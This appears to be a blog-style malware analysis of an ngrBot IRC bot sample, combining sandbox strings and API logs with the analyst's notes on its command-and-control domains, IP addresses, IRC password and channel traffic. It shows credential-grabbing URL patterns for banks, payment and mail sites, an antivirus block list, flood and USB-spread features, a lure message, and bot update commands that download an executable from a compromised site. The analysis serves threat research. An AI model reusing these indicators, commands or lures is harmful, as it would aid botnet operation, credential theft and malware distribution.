8 9,989D9P99h9x9|9
: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:
; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x;
< <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|<
=(=0=8=@=H=T==d=l=

Unicode Strings:
---------------------------------------------------------------------------
Ajjj
jjjj
jjjj
jjjj
$jjj
Ajjj
DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Exploreriexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

31upjmrlzz.exe

Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
768    1176        C:Documents and SettingsMes documents31upjmrlzz.exe    

Ports:
Port    PID    Type    Path    
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

IE Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

Loaded Drivers:
Driver File    Company Name    Description    
--------------------------------------------------

Monitored RegKeys
Registry Key    Value    
--------------------------------------------------

Kernel31 Api Log
    
--------------------------------------------------
***** Installing Hooks *****    
719f74df     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)    
719f80c4     RegOpenKeyExA (Protocol_Catalog9)    
719f777e     RegOpenKeyExA (00000095)    
719f764d     RegOpenKeyExA (Catalog_Entries)    
719f7cea     RegOpenKeyExA (000000000001)    
719f7cea     RegOpenKeyExA (000000000002)    
719f7cea     RegOpenKeyExA (000000000003)    
719f7cea     RegOpenKeyExA (000000000004)    
719f7cea     RegOpenKeyExA (000000000005)    
719f7cea     RegOpenKeyExA (000000000006)    
719f7cea     RegOpenKeyExA (000000000007)    
719f7cea     RegOpenKeyExA (000000000008)    
719f7cea     RegOpenKeyExA (000000000009)    
719f7cea     RegOpenKeyExA (000000000010)    
719f7cea     RegOpenKeyExA (000000000011)    
719f7cea     RegOpenKeyExA (000000000012)    
719f7cea     RegOpenKeyExA (000000000013)    
719f7cea     RegOpenKeyExA (000000000014)    
719f7cea     RegOpenKeyExA (000000000015)    
719f7cea     RegOpenKeyExA (000000000016)    
719f7cea     RegOpenKeyExA (000000000017)    
719f7cea     RegOpenKeyExA (000000000018)    
719f7cea     RegOpenKeyExA (000000000019)    
719f2623     WaitForSingleObject(77c,0)    
719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    
719f777e     RegOpenKeyExA (00000039)    
719f835b     RegOpenKeyExA (Catalog_Entries)    
719f84ef     RegOpenKeyExA (000000000001)    
719f84ef     RegOpenKeyExA (000000000002)    
719f84ef     RegOpenKeyExA (000000000003)    
719f84ef     RegOpenKeyExA (000000000004)    
719f2623     WaitForSingleObject(774,0)    
719e1af2     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)    
719e198e     GlobalAlloc()    
7c80b72f     ExitThread()    
7d2454bb     LoadLibraryA(KERNEL32.DLL)=7c800000    
7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    
73371c38     GetCommandLineA()    
73372f57     CreateMutex((null))    
7d23eab5     WaitForSingleObject(764,7530)    
410df8     LoadLibraryA(KERNEL32.DLL)=7c800000    
410df8     LoadLibraryA(MSVBVM60.DLL )=73370000    
733739f4     GetCommandLineA()    
7338d1b3     LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0    
7337452c     GetVersionExA()    
7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    
772370b9     GetVersionExA()    
7723711c     GetCommandLineA()    
7337476c     LoadLibraryA(SXS.DLL)=77210000    
774efa66     LoadLibraryA(oleaut32.dll)=770e0000    
73376792     RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)    
77daeff6     RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)    
770fc957     LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000    
7337a15b     LoadLibraryA(kernel32.dll)=7c800000    
406f1e     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(USER32)=7e390000    
7345d09c     CreateFileA(C:Documents and SettingsMes documents31upjmrlzz.exe)    
7345d34f     ReadFile()    
406f1e     LoadLibraryA(NTDLL)=7c910000    
7c8165b3     WaitForSingleObject(74c,64)    
7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    
7337a4c5     GetCurrentProcessId()=1176    
7337bdfa     RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)    
7337be1c     RegOpenKeyExA (HTML Help)    
7337be1c     RegOpenKeyExA (Help)    
7337c9ce     WaitForSingleObject(7e4,ffffffff)    
73373657     ExitProcess()    
***** Injected Process Terminated *****    

DirwatchData
    
--------------------------------------------------
WatchDir Initilized OK    
Watching C:DOCUME~1LOCALS~1Temp    
Watching C:WINDOWS    
Watching C:Program Files    
Created: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf    
Modifed: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf    
Created: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp    
Created: C:DOCUME~1zezakLOCALS~1TempJET37.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET37.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp    
File: 31upjmrlzz.exe
Size: 116236 Bytes
MD5: 9702091B21C1A48955A5268D07E31EF6
Packer: File not found C:iDEFENSESysAnalyzerpeid.exe

File Properties: CompanyName      
FileDescription  
FileVersion      
InternalName     
LegalCopyright   
OriginalFilename 
ProductName      
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 312Kb in 0,032 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d

RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

ExeRefs
--------------------------------------------------
File: 31upjmrlzz_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Exploreriexplore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe

Raw Strings:
--------------------------------------------------
File: 31upjmrlzz_dmp.exe_
MD5:  42157d0a769f0335830e4646c6a00338
Size: 319490

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
\\.\pipe\%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG 
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
\\.\PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host: 
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 -> 
FTP -> 
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%\system32\cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length: 
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability: 
From: 
Content-Length: %d
X-MMS-IM-Format: 
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
send
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
lalorlz1.info
ROCKR
rlz1lola.info
ROCKR
rlz01jm.info
ROCKR
#ROCK
ngrBot
ELPERRO
]1.1.0.0
CUSTOMER
FvLQ49IlzIyLjj6m
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
\\.\pipe\%08x_ipc

Unicode Strings:
---------------------------------------------------------------------------
DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Explorer\iexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

We have two new domains here:

rlz01jm.info - not active yet
rlz1lola.info - active
lalorlz1.info - this is an old domain, already posted on my blog

Resolved : [rlz1lola.info] To [176.9.192.215]

176.9.192.216 port 5236, IRC PASS ROCKR - botnet server here
176.9.192.215 port 5236, IRC PASS ROCKR - botnet server here

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita |"
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira este videito de jlo desnuda http://www.endenter.com/IMG00359268.JPG pufff mamacita"
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 16 domain(s)
PRIVMSG #ROCK :[d="http://www.endenter.com/wp-includes/css/update/30upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0
NICK n{US|XPa}eovvenu
USER eovvenu 0 0 :eovvenu
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "4"
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "4"

Now talking in #ROCK
Topic On: [ #ROCK ] [ ,up http://www.endenter.com/wp-includes/css/update/31upjmrlzz.exe 9702091B21C1A48955A5268D07E31EF6 | ,mdns http://www.endenter.com/wp-includes/css/update/dos.txt ]
Topic By: [ rockstar ]


Hosting info:
http://whois.domaintools.com/176.9.192.215
